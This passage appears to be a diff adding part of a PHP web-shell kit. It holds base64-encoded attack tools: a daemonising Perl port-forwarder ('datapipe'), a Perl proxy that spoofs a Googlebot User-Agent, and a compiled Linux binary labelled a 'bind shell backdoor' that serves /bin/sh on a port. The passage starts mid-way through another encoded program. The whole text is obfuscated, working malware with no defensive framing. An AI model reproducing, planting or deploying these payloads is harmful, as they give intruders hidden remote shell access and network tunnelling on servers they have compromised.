+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
+luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
+0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
+UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
+DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
+AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
+GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
+cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
+BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
+AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
+TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
+eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
+oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
+VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
+CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
+b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
+0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
+9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
+CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
+aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
+gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
+9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
+$port_bind_bd_cs="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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